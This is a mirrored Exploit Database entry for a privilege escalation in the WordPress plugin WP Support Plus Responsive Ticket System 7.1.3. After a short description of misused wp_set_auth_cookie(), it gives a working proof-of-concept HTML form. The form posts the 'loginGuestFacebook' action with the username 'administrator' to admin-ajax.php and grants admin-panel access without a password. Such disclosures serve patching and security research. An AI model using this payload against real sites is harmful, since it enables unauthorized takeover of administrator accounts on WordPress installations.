WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 – Privilege Escalation

• Exploit Database
• 19 阅读

• 作者： Kacper Szurek
  日期： 2017-01-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/41006/

• # Exploit Title: WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation
  # Date: 10-01-2017
  # Software Link: https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/
  # Exploit Author: Kacper Szurek
  # Contact: http://twitter.com/KacperSzurek
  # Website: http://security.szurek.pl/
  # Category: web
   
  1. Description
  
  You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().
  
  http://security.szurek.pl/wp-support-plus-responsive-ticket-system-713-privilege-escalation.html
  
  2. Proof of Concept
  
  <form method="post" action="http://wp/wp-admin/admin-ajax.php">
  	Username: <input type="text" name="username" value="administrator">
  	<input type="hidden" name="email" value="sth">
  	<input type="hidden" name="action" value="loginGuestFacebook">
  	<input type="submit" value="Login">
  </form>
  
  Then you can go to admin panel.